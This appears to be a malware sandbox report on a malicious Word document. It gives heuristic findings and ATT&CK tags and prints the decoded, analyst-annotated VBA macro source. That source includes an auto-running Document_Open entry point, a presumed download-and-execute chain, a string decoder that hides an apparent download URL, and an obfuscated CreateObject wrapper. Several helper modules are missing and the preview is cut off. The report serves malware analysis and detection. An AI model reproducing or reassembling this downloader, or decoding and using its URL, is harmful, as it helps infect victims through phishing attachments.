MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a Document_Open macro indicates that the VBA code is designed to run automatically when the document is opened, and the high-severity heuristics for CreateObject and CallByName show that it instantiates COM objects and drives them by name. The obfuscation of the VBA script prevents a detailed analysis of its exact function, but it is highly probable that it attempts to download and execute a secondary payload. The extracted URLs are standard Office schema namespaces and offer no further clues.
Heuristics 6
- VBA macros detected (medium, 4 related findings) — OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) — OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) — OLE_VBA_CREATEOBJ: CreateObject call
- CallByName call (high) — OLE_VBA_CALLBYNAME: CallByName call
- VBA p-code auto-exec with execution tokens (high) — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14718 bytes |
| SHA-256: 6c4846d8598ef1f82849473010bc29d96a31053ca81d94dd39b7770633e27071 | | | |
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: decoy-looking routine. Both parameters are unused, the flag GDiCp and every
' procedure called here (CIkPvETJFUk, JFWxcIjPC, jqPQzD, TGmhFfRyvckn, JhNaBG, NQRybJUhZKprF,
' lFuWfXpMg) are undefined in the extracted source, and the return value is the constant 5291.
' Nothing in the visible part of the preview calls it. Whether the undefined names resolve in a
' module that is not shown here cannot be determined from this page.
Private Function fvKAaq(ByVal RjHAYZ As String, ByVal plZMuVXW As String) As Integer
CIkPvETJFUk
JWAJBH = 6891 ' undeclared name; an implicit Variant unless Option Explicit is in force elsewhere
JFWxcIjPC 4165
jqPQzD 7578, "ytiGjsd6ekKE"
If GDiCp Then
TGmhFfRyvckn "KPKE2HeClOLt", True, "HRt68o9ZNQ"
JhNaBG "AMfRcApjwJrG0bt", True
NQRybJUhZKprF
Else
lFuWfXpMg 1146
End If
fvKAaq = 5291 ' fixed return value regardless of input
End Function
' Analyst note: decoy-looking routine. Both parameters are unused and all three callees
' (wjOhKnl, sQZNJVCfHZN, naHcc) are undefined in the extracted source; not called from the
' visible part of the preview.
Private Sub OicfHgZKVWVjfS(ByVal ROjtSfe As String, ByVal zojJPqZNmTLS As Integer)
wjOhKnl "iBqpXyVXVHZaR7y", 5222, True
sQZNJVCfHZN
naHcc 7063
End Sub
' Analyst note: decoy-looking routine. Branches on the undefined VlDpzxjXRiD, calls undefined
' procedures on either path, and always returns the constant "TTwrJXZ1Y4". Not called from the
' visible part of the preview.
Private Function RaRKlSjcuok() As String
If VlDpzxjXRiD Then
ZIyxebwODKgm
Else
aeDGRAWOKLFzkM 2523
End If
RaRKlSjcuok = "TTwrJXZ1Y4" ' fixed return value
End Function
' Auto-execution entry point: Word runs Document_Open when the document is opened (this is the
' OLE_VBA_DOCOPEN finding in the report). The unused local and the assignment to the undeclared
' AtovKyQBvllrVa are filler; the only real work is the call into module iurSDPGCtkdXP, whose
' public ONzArApHFkICm drives the rest of the chain.
Private Sub Document_Open()
Dim aOwVHlBlpxax As String ' declared, never used
AtovKyQBvllrVa = 5132 ' undeclared name; filler
iurSDPGCtkdXP.ONzArApHFkICm ' hand-off to the real entry point (module iurSDPGCtkdXP)
End Sub
' Analyst note: decoy-looking routine. Both parameters are unused, every callee (AOYJU,
' CRTrffoKEvF, roQQLb, AHDmJRufY) is undefined in the extracted source, and it always returns
' False. Not called from the visible part of the preview.
Private Function LhplDdFLj(ByVal SqtOT As Integer, ByVal BSRdtj As String) As Boolean
AOYJU 564, 1218, "SlRtSQMod8yKy"
JnHbvIhGtMNp = 5855 ' undeclared name; filler
CRTrffoKEvF 1901, "CrLjGfjfnt"
roQQLb 7473
AHDmJRufY 238, "ewqCg0U9eI46", "uVr1BazvfhaP"
LhplDdFLj = False ' fixed return value
End Function
Attribute VB_Name = "iurSDPGCtkdXP"
' Presumed download-and-run stage, reached from ONzArApHFkICm. It passes an opaque value from
' module ejtrxReBIBUyR (ZtFAYECi — looks like a destination path, TODO confirm) and the runtime-
' decoded string from tMMYmHU() (apparently a URL) to iJueTzjdd, then invokes
' ejtrxReBIBUyR.MnHBqswijt on that same value. Module ejtrxReBIBUyR is not part of this preview,
' so what MnHBqswijt does with the value (execution is the natural reading given the report
' summary) is not verified here.
Private Sub enIVozeeGiem()
Dim jKPQSEuutha As Integer ' declared, never used
IsQDtkacJsON = 7110 ' undeclared name; filler
iJueTzjdd ejtrxReBIBUyR.ZtFAYECi, 1503, tMMYmHU ' (target?, filler, decoded URL-like string)
ejtrxReBIBUyR.MnHBqswijt ejtrxReBIBUyR.ZtFAYECi ' acts on the same target value — TODO confirm in module ejtrxReBIBUyR
End Sub
' Real entry point, called from ThisDocument.Document_Open. "On Error GoTo GIEifT" targets an
' empty label, so any runtime error (missing COM object, blocked network, write failure, ...)
' ends the routine silently with no user-visible sign — worth knowing when the sample appears to
' do nothing in a sandbox. IpEfKV is a module not included in this preview; what sgRKorfj and
' NwXpZWHfDnf do cannot be determined from this page. The chain then continues in enIVozeeGiem.
Public Sub ONzArApHFkICm()
oucjzcinmWTVGi = 4891 ' undeclared name; filler
On Error GoTo GIEifT ' every runtime error is swallowed
IpEfKV.sgRKorfj ' module IpEfKV not in preview — TODO inspect
IpEfKV.NwXpZWHfDnf ' module IpEfKV not in preview — TODO inspect
enIVozeeGiem ' presumed download/drop stage
Exit Sub
GIEifT: ' empty handler: error leads straight to End Sub
End Sub
' Core of the presumed downloader. Every step goes through helpers in modules pGwrUXKyr,
' ejtrxReBIBUyR and uQHXwgmR that are not in this preview, so what follows is the shape of the
' code, not confirmed behaviour: an object is obtained from pGwrUXKyr.IKIuG using GPbwXSXU (the
' URL-like string from tMMYmHU), a member of that object is read by a runtime-decoded name
' (cf. the OLE_VBA_CALLBYNAME finding), and the result is handed together with dbhXZ to
' ejtrxReBIBUyR.unvIXAYLSYMLu. CaDod is unused. The two string literals are key-obfuscated; decode
' them with qPKtf.LjgMgzvQpOMhN before drawing conclusions — they look like a text message and a
' COM property name respectively, TODO confirm.
Private Sub iJueTzjdd(ByVal dbhXZ As String, ByVal CaDod As Integer, ByVal GPbwXSXU As String)
Dim qCKszCQwGnH As Integer ' declared, never used
Set uSunG = pGwrUXKyr.IKIuG("2g9c1xwaIKK", GPbwXSXU, "fS4dLFhwjQc3") ' uSunG is undeclared; IKIuG not visible in this preview
pGwrUXKyr.zFeXXjpDotNa uSunG, qPKtf.LjgMgzvQpOMhN("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj") ' second argument is decoded at runtime
ejtrxReBIBUyR.unvIXAYLSYMLu dbhXZ, uQHXwgmR.PiVneV(uSunG, qPKtf.LjgMgzvQpOMhN("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q")) ' member of uSunG read by decoded name, then passed on with dbhXZ
End Sub
' Thin CreateObject wrapper (the OLE_VBA_CREATEOBJ finding): instantiates whatever ProgID the
' caller passes in GxFzAhlNIxn and returns it through the identity function tgaCE, which only
' puts one extra hop between CreateObject and its consumer. kOehqnhaZspbkF and both locals are
' unused. Not called from the visible part of the preview; the caller is presumably in a module
' that is not shown here.
Public Function YKvUmnO(ByVal kOehqnhaZspbkF As String, ByVal GxFzAhlNIxn As String) As Object
Dim IniMFqJthap As String ' declared, never used
Dim qYToCbBHhTlJs As String ' declared, never used
Set YKvUmnO = tgaCE(CreateObject(GxFzAhlNIxn), False, False) ' ProgID comes from the caller
End Function
' Identity function: returns JHplXpXB unchanged; the two Boolean parameters are ignored.
' Exists only to obscure the direct use of the CreateObject result in YKvUmnO.
Private Function tgaCE(ByVal JHplXpXB As Object, ByVal gvzTxyb As Boolean, ByVal lcwvfCmNuqeIxb As Boolean) As Object
Set tgaCE = JHplXpXB
End Function
' Returns a string decoded at runtime by qPKtf.LjgMgzvQpOMhN. The cleartext is not shown anywhere
' on this page; dropping the key characters from the literal by hand makes its leading characters
' read http://, so the result is very likely the download URL used by enIVozeeGiem/iJueTzjdd.
' Recover it with the decoder and treat it as an indicator for blocking and hunting.
Private Function tMMYmHU() As String
tMMYmHU = qPKtf.LjgMgzvQpOMhN("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML") ' (ciphertext, key)
End Function
Attribute VB_Name = "qPKtf"
' String decoder used throughout the sample: fqtdUgRdJ is the obfuscated text, rAVKHfdcXpQ the
' key. All helpers (etdjJMlUgCJJp.ypTiE, juNGoc, LpaKnDK and, via ERNBjA, yqhjXuyPzPe) live in a
' module that is not in this preview, so only the shape is certain: it walks positions from
' HcjLBkiEARGkcz() (= 1) to ypTiE(..., fqtdUgRdJ) — presumably Len — and folds ERNBjA(key, <char>)
' into the running return value, presumably by concatenation. Since ERNBjA keeps a character only
' when yqhjXuyPzPe(...) is False, the net effect is consistent with "drop every character that
' appears in the key" — verify against a fully decoded string before relying on it. The first
' literal argument of each helper looks like filler.
Public Function LjgMgzvQpOMhN(ByVal fqtdUgRdJ As String, ByVal rAVKHfdcXpQ As String) As String
Dim YFCNPGqz As Boolean ' declared, never used
For TgYIwO = HcjLBkiEARGkcz To etdjJMlUgCJJp.ypTiE("JiZetYgNzqIM", fqtdUgRdJ) ' TgYIwO is undeclared; upper bound presumably Len(fqtdUgRdJ)
LjgMgzvQpOMhN = etdjJMlUgCJJp.juNGoc("MT7mNDYhCPs9", LjgMgzvQpOMhN, 8054, ERNBjA(rAVKHfdcXpQ, etdjJMlUgCJJp.LpaKnDK(TgYIwO, "jQRmVT0yjlnJ5vB", fqtdUgRdJ))) ' LpaKnDK presumably Mid(text, i, 1); juNGoc presumably concatenation — TODO confirm
Next
End Function
' Analyst note: decoy-looking routine. The parameter is unused, every callee (uMlYtSUHd,
' cdMOlSvIwbZ, CryJBQjzIjjAL, gfBXxUaJWrIf, NscRhRyJBDv) is undefined in the extracted source,
' and the assignments go to undeclared names. Not called from the visible part of the preview.
Private Sub tKyFLY(ByVal tgAspzOCCPRc As Boolean)
YeOUSKbjsQSeHv = "LmzuBVC6d" ' undeclared name; filler
uMlYtSUHd 4633, "qRTudaFcn"
cdMOlSvIwbZ "jelylouIu", "SqZR0uDkvu9k0As", "7PbaXEF5x"
rFqbKCDfWQTRCa = False ' undeclared name; filler
CryJBQjzIjjAL "E8gfTrZgIm1un7"
gfBXxUaJWrIf 7882
cGOKdTFyCZjE = 779 ' undeclared name; filler
NscRhRyJBDv
End Sub
' Analyst note: decoy-looking routine. Branches on the undefined xjhEYtWTu, calls the undefined
' ByxHwGYit and assigns an undeclared name. Not called from the visible part of the preview.
Private Sub biLps()
If xjhEYtWTu Then
ByxHwGYit
MoFuIxgPJ = "2Xr8Zmcrck6L" ' undeclared name; filler
End If
End Sub
' Per-character filter for the decoder LjgMgzvQpOMhN: returns HXsgjVgtmR unchanged when
' etdjJMlUgCJJp.yqhjXuyPzPe(...) is False, otherwise falls through and returns the VBA default
' for an unassigned String result, "". yqhjXuyPzPe is not in this preview; it is presumably a
' membership test of the character HXsgjVgtmR against the key JqwChEMzvTVegT — TODO confirm.
' Both locals are unused.
Private Function ERNBjA(ByVal JqwChEMzvTVegT As String, ByVal HXsgjVgtmR As String) As String
Dim ioylxn As Integer ' declared, never used
Dim fiPHulhgAVDg As String ' declared, never used
If Not etdjJMlUgCJJp.yqhjXuyPzPe(HXsgjVgtmR, "eGPQegGkvXuCkf", JqwChEMzvTVegT, 4638) Then ' second and fourth args look like filler
ERNBjA = HXsgjVgtmR
End If ' no Else: result stays ""
End Function
' Returns the constant 1, used as the loop start index in LjgMgzvQpOMhN. The assignment to the
' undeclared LTleDTcEW is filler.
Private Function HcjLBkiEARGkcz() As Integer
LTleDTcEW = "YRiN3zRorJJqyMb" ' undeclared name; filler
HcjLBkiEARGkcz = 1
End Function
Attribute VB_Name = "pGwrUXKyr"
Private Function VJwqlnCkCZsZ() As String
FaVDWvMiFb
uCKxyjpW "HsmZfMX2tfHRJ", "Toaxo3tHExKrkJ", 1389
LCjkyELUitfwTn
qWyHYZHtbegHJD 2198, 3506, 5073
JYBeU
VJwqlnCkCZsZ = "ay2916dWNOdif52"
... (truncated)